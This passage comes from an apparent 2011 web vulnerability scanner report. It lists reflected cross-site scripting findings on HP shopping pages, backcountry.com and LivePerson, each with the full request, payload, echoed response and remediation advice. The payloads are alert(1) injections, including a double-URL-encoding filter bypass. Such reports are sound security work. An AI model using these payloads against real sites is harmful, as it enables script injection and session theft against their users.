Referer: http://hpproserv.pb.feedroom.com/hp/hpproserv/hpscaleshare/player.swf?Environment=&Site%20ID=hpproserv&SiteName=HP%20Products%20&%20ServicesVideos&SkinName=hpscaleshare&ChannelID=2694b6388b9296446822a583bebf9f8fd966e0b1&StoryID=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7&Volume=5&AutoPlay=false&VideoPlayer.videoPlayer1.StoryLinkURL=http://h30428.www3.hp.com/?fr_story=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7&MoreVideoURL=http://h30428.www3.hp.com/?fr_story=dfcdd4fb5a3b5230c67fde9d4cde908f365418f7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:01:11 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
ntCoent-Length: 376
Content-Type: text/html
Cache-Control: private
Content-Length: 376

<A HREF="http://oascentral.feedroom.com/RealMedia/ads/click_lx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/744055514/x454abbb"><script>alert(1)</script>df0488ef607/default/empty.gif/4d686437616b3536694b6f41424c3166?x" target="_top">
...[SNIP]...

1.18. http://sales.liveperson.net/hc/9551721/ [msessionkey parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/9551721/

Issue detail

The value of the msessionkey request parameter is copied into the HTML document as plain text between tags. The payload fa34b<img%20src%3da%20onerror%3dalert(1)>d1a07869438 was submitted in the msessionkey parameter. This input was echoed as fa34b<img src=a onerror=alert(1)>d1a07869438 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hc/9551721/?&visitor=5110247826455&msessionkey=8682657700751775312fa34b<img%20src%3da%20onerror%3dalert(1)>d1a07869438&siteContainer=STANDALONE&site=9551721&cmd=mTagKnockPage&lpCallId=120741052087-692197301424&protV=20&lpjson=1&id=7011085767&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-bcs%7Cnull%7ClpChatDynamicChatButtonDiv%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.backcountry.com/mens-clothing
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=8682657700751775312; HumanClickSiteContainerID_9551721=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 12:15:21 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=8682657700751775312fa34b<img src=a onerror=alert(1)>d1a07869438; path=/hc/9551721
Set-Cookie: HumanClickKEY=8682657700751775312fa34b<img src=a onerror=alert(1)>d1a07869438; path=/hc/9551721
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Thu, 22 Sep 2011 12:15:21 GMT
Set-Cookie: HumanClickSiteContainerID_9551721=STANDALONE; path=/hc/9551721
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 31316

lpConnLib.Process({"ResultSet": {"lpCallId":"120741052087-692197301424","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...
,{"code_id": "FPCookie", "js_code": "lpMTagConfig.FPC_VID_NAME='9551721-VID'; lpMTagConfig.FPC_VID='5110247826455'; lpMTagConfig.FPC_SKEY_NAME='9551721-SKEY'; lpMTagConfig.FPC_SKEY='8682657700751775312fa34b<img src=a onerror=alert(1)>d1a07869438';lpMTagConfig.FPC_CONT_NAME='HumanClickSiteContainerID_9551721'; lpMTagConfig.FPC_CONT='STANDALONE'"},{"code_id": "SYSTEM!firstpartycookies_compact.js", "js_code": "function lpFirstPartyCookieSupport(
...[SNIP]...

1.19. http://www.backcountry.com/store/cart/add.html [mv_sku parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.backcountry.com
Path:   /store/cart/add.html

Issue detail

The value of the mv_sku request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64d03"style%3d"x%3aexpression(alert(1))"59a957fd2af was submitted in the mv_sku parameter. This input was echoed as 64d03"style="x:expression(alert(1))"59a957fd2af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /store/cart/add.html?item_code=BCS0021&mv_order_group=1&mv_todo=refresh&mv_form_profile=option_check&mv_session_id=&mv_order_cat_id=&mv_order_subcat_id=&mv_order_pg_id=&mv_order_catalog_id=&mv_order_is_gift_box=0&is_package=0&is_giftcert=1&mv_javascript=1&mv_sku=64d03"style%3d"x%3aexpression(alert(1))"59a957fd2af&sku_options=1&mv_order_swatch_position=&mv_order_quantity=1&x=61&y=13 HTTP/1.1
Host: www.backcountry.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.backcountry.com/backcountry-gift-certificate-bcs0021
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid_w4kr1ll1r0=2ABAD7B1-7D08-4A54-B5F7-5E536E68E075; s_cpm=%5B%5B%27Direct%2520Load%27%2C%271316711542269%27%5D%5D; mt.v=1.346469883.1316711542790; s_vi=[CS]v1|273D92EC05013BC2-40000109E026E9CB[CE]; __ar_v4=; rdv_test_group=1; MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; RES_TRACKINGID=841292264887481; siec=true; affiliate_reference_id=R999; __utmx=248652180.; __utmxx=248652180.; s_cc=true; mr_referredVisitor=0; s_sq=%5B%5BB%5D%5D; utag=session_id:1316711948944$_session:1316713377068; c49=PDP%3ABackcountry.com%20Gift%20Certificate

Response

HTTP/1.1 200 OK
Server: Apache
X-Session-Path: Long id in cookie
X-Session-Checked: 1
P3P: CP="IND NON DSP PHY ONL UNI FIN PUR COM INT DEM CNT STA PRE POL CUR ADMa PSAo PSDo IVAo IVDo CONo OUR", policyref="http://www.backcountry.com/w3c/p3p.xml"
Cache-Control: s-maxage=3600
Edge-Cache: max-age=3600
X-HandledBy: grays
Content-Length: 29742
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 22 Sep 2011 12:12:46 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; path=/; expires=Sun, 19-Sep-2021 12:12:46 GMT
Set-Cookie: CART=mi%3d500%3bq%3d1%3bpr%3d125%2e00%3bsku%3dBCS0021%2dBCSGC125%2dONSI%3bhasbox%3d0%3b%23mi%3d500%3bq%3d1%3bpr%3d125%2e00%3bsku%3dBCS0021%2dBCSGC125%2dONSI%3bhasbox%3d0%3b%23; path=/; expires=Sun, 19-Sep-2021 12:12:46 GMT
Set-Cookie: siec=false; path=/; expires=Tue, 21-Sep-2021 22:12:46 GMT
Set-Cookie: affiliate_reference_id=R999; path=/; expires=Tue, 21-Sep-2021 22:12:46 GMT
Set-Cookie: omn_cookie=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: tr_template=; path=/; expires=Fri, 23-Sep-2011 12:12:46 GMT
Set-Cookie: cart_cross_sell=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_content_upload=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_poos=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_order_detail=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: promo_nav=; path=/; expires=Sun, 19-Sep-2021 12:12:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphp
...[SNIP]...
<input type="hidden" name="mv_sku" value="64d03"style="x:expression(alert(1))"59a957fd2af" />
...[SNIP]...

1.20. http://www.shopping.hp.com/design [jumpid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /design

Issue detail

The value of the jumpid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e99c0'%3b814e131ae4d was submitted in the jumpid parameter. This input was echoed as e99c0';814e131ae4d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /design?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_accessoriese99c0'%3b814e131ae4d HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/go/touchpadfaqs;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_tablet_home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; hpshopping=1&user_id=mlksgt%2BT3Ap7MSrqvlvccAyb0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGS&cart_id=1603777571; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; prop12=r602; EMID=; s_depth=21; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Ampr%3Aportal%3Amain; 
s_cc=true; hpcompc_usen=cartExists=true; HP_EBUS=true; HP_EBUS_HP_CLICKS=4x19x11121; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Alanding%25253Astatic%25253Atouchpadfaqs%2526pidt%253D1%2526oid%253D%25252Fdesign_jumpid%25253Din_R329_prodexp%25252Fhhoslp%25252Fpsg%25252Flateralnav_accessories_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:18:20 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:18:21 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 149144

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hps_he
...[SNIP]...
= 'hho:gs:landing:Electronics &amp; Accessories Deals';
if (s_pageName != null) s_pageName = s_pageName.toLowerCase();
var s_prop4 = 'in_R329_prodexp/hhoslp/psg/lateralnav_accessoriese99c0';814e131ae4d|Electronics &amp; Accessories Deals';
var s_prop21 = 'Electronics &amp; Accessories Deals||0|';

var omni_landing = 'design_center';
var omni_landing_value = omni_landing;
switch(omn
...[SNIP]...

1.21. http://www.shopping.hp.com/desktops [HHOJSID parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /desktops

Issue detail

The value of the HHOJSID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4923e'%3b1cd62d1ca9e was submitted in the HHOJSID parameter. This input was echoed as 4923e';1cd62d1ca9e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /desktops;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_desktops_home4923e'%3b1cd62d1ca9e HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; hpshopping=1&user_id=mlkpjNmR0Qt%2BNyntuVfacgSd0ic%3D; hpcompc_usen=cartExists=false; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; EMID=; s_depth=2; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Ahome; s_cc=true; s_sq=%5B%5BB%5D%5D; HP_EBUS_HP_CLICKS=1x1x1

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:55:05 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkqgtqf2Qt7MiHjv1bYeQeXlmvi; expires=Friday, 20-Jan-2012 00:55:06 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:55:06 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 208180


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...
String(omni_subcat1)) omni_subcat1 = '';

var s_prop21 = '|' + omni_category + '|' + omni_catLevel + '|' + omni_subcat1;
var s_prop4 = 'in_R329_prodexp/hhoslp/psg/lateralnav_desktops_home4923e';1cd62d1ca9e|';
var s_channel = omni_landing;
var s_prop25 = omni_landing + ':main';
var s_pageName = 'hho:gs:landing:cs:' + omni_landing;
var s_eVar23 = (isComputerStore(s_channel)) ? s_channel :
...[SNIP]...

1.22. http://www.shopping.hp.com/esp [HHOJSID parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /esp

Issue detail

The value of the HHOJSID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8e87'%3bf56825840e5 was submitted in the HHOJSID parameter. This input was echoed as d8e87';f56825840e5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /esp;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_services_homed8e87'%3bf56825840e5 HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; EMID=; s_depth=3; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Alanding%3Acs%3Adesktops; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949238'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949239'%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D; hpshopping=1&user_id=mlkpiNuW0Ql6Oijjs1beeACYlmvi; hpcompc_usen=cartExists=false; HP_EBUS_HP_CLICKS=2x2x8

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:55:13 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkjitiT3gpxNi7qulPaeAKc0ic%3D&s1=xss+printer; expires=Friday, 20-Jan-2012 00:55:14 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:55:14 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 168020


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...
g = 'esp';

var s_pageName = 'hho:gs:landing:Services';
if (s_pageName != null) s_pageName = s_pageName.toLowerCase();
var s_prop4 = 'in_R329_prodexp/hhoslp/psg/lateralnav_services_homed8e87';f56825840e5|Services';
if ( omni_landing == 'printer' || omni_landing == 'photography' || omni_landing == 'handheld' || omni_landing == 'outlet' )
{
var s_prop21 = "Services |" + omni_category + "|"
...[SNIP]...

1.23. http://www.shopping.hp.com/printer [HHOJSID parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /printer

Issue detail

The value of the HHOJSID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12eb7'%3b575b1aa8f4d was submitted in the HHOJSID parameter. This input was echoed as 12eb7';575b1aa8f4d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /printer;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_printers_home12eb7'%3b575b1aa8f4d HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; hpshopping=1&user_id=mlksj9iT3wN6My%2FvuVvfeAGd0ic%3D; hpcompc_usen=cartExists=false; EMID=; s_depth=4; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Alanding%3Astatic%3Atouchpadfaqs; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949238'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953100'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949239'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953101'%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D; HP_EBUS_HP_CLICKS=3x3x12

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:55:21 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkqj92f2A14MinpvVHWcQCenGvi&s1=xss+printer&s2=xss+printeredf6ffb93d89de9464acd56a&s3=edf6ffb9384ae95321d80a57; expires=Friday, 20-Jan-2012 00:55:21 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:55:21 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 199557


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...
var s_pageName = 'hho:gs:landing:Printers & all-in-ones';
if (s_pageName != null) s_pageName = s_pageName.toLowerCase();
var s_prop4 = 'in_R329_prodexp/hhoslp/ipg/lateralnav_printers_home12eb7';575b1aa8f4d|Printers & all-in-ones';
if ( omni_landing == 'printer' || omni_landing == 'photography' || omni_landing == 'handheld' || omni_landing == 'outlet' )
{
var s_prop21 = "Printers & all-in-o
...[SNIP]...

1.24. http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /scat/desktops/p7xt_series/rts/3/computer_store

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6259d%2522%2520a%253db%25208dcb49babd8 was submitted in the REST URL parameter 5. This input was echoed as 6259d" a=b 8dcb49babd8 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

POST /scat/desktops/p7xt_series/rts/36259d%2522%2520a%253db%25208dcb49babd8/computer_store HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Content-Length: 0
Cache-Control: max-age=0
Origin: http://www.shopping.hp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/store_access.do?template_type=series_detail&category=desktops&series_name=p7xt_series&jumpid=in_R329_prodexp/hhoslp/psg/desktops/promo_tile/1/dt_promo_tile1_Budget_Friendly_921
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; hpshopping=1&user_id=mlkjit%2BQ3Ql7NSzqs1TccwGd0ic%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Apopup%3Afree%20shipping; 